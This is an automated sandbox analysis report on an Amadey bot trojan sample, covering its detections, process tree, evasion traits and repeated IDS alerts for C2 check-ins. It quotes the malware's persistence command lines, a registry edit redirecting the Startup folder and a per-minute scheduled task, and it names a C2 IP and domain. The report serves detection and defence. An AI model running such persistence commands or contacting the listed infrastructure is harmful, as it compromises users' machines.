Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Trojan.Siggen15.38099.19640.25720

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Siggen15.38099.19640.25720 (renamed file extension from 25720 to exe)
Analysis ID:520871
MD5:34cca2013eb9b2941a65971919bf356d
SHA1:59f15a169b6c42340849a609edb146e2f6614076
SHA256:735d3e2eb44123fe560ce027b907b3b1494b0f926aceb641dcdf428a21b8aac0
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Amadey bot
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for sample
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Direct Autorun Keys Modification
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe (PID: 1744 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe" MD5: 34CCA2013EB9B2941A65971919BF356D)
    • rnyuf.exe (PID: 5824 cmdline: "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" MD5: 34CCA2013EB9B2941A65971919BF356D)
      • cmd.exe (PID: 6636 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6120 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • schtasks.exe (PID: 4460 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rnyuf.exe (PID: 5908 cmdline: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe MD5: 34CCA2013EB9B2941A65971919BF356D)
  • rnyuf.exe (PID: 1808 cmdline: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe MD5: 34CCA2013EB9B2941A65971919BF356D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.946875767.00000000048F5000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
      00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
        00000003.00000002.943681294.0000000000E23000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
          00000003.00000002.943646127.0000000000DE9000.00000004.00000020.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
            00000003.00000003.882574918.00000000048C6000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
              Click to see the 5 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicius Add Task From User AppData TempShow sources
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe, ParentProcessId: 5824, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F, ProcessId: 4460
              Sigma detected: Direct Autorun Keys ModificationShow sources
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6636, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\, ProcessId: 6120

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeVirustotal: Detection: 70%Perma Link
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeReversingLabs: Detection: 78%
              Multi AV Scanner detection for domain / URLShow sources
              Source: depressionk1d.ugVirustotal: Detection: 9%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeReversingLabs: Detection: 78%
              Machine Learning detection for sampleShow sources
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeJoe Sandbox ML: detected
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49785 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: rnyuf.exe

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49782 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49783 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49824 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49825 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49829 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49832 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49834 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49836 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49837 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49843 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49849 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49852 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49854 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49865 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49883 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49889 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49892 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49897 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49902 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49903 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49907 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49914 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49933 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49954 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49959 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49975 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49978 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49984 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49991 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50004 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50009 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 178.208.83.45:80
